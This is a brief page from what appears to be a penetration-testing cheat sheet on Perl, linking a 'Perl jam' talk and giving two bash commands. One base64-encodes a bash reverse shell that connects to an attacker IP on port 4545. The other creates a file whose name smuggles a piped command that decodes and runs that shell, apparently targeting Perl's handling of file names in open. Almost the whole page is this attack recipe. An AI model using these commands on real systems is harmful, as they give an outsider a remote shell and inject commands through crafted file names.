> For the complete documentation index, see [llms.txt](https://docs.h4rithd.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.h4rithd.com/languages/perl.md).

# Perl

* [Perl jam](https://www.youtube.com/watch?v=RPvORV2Amic)

```bash
## ------------------| Create rev shell ( remove + and == )
echo -n 'bash  -i >& /dev/tcp/<IP>/4545 0>&1' | base64 -w 0

## ------------------| Create file
touch -- '| echo YmFzaCAgLW|base64 -d|bash;'
```
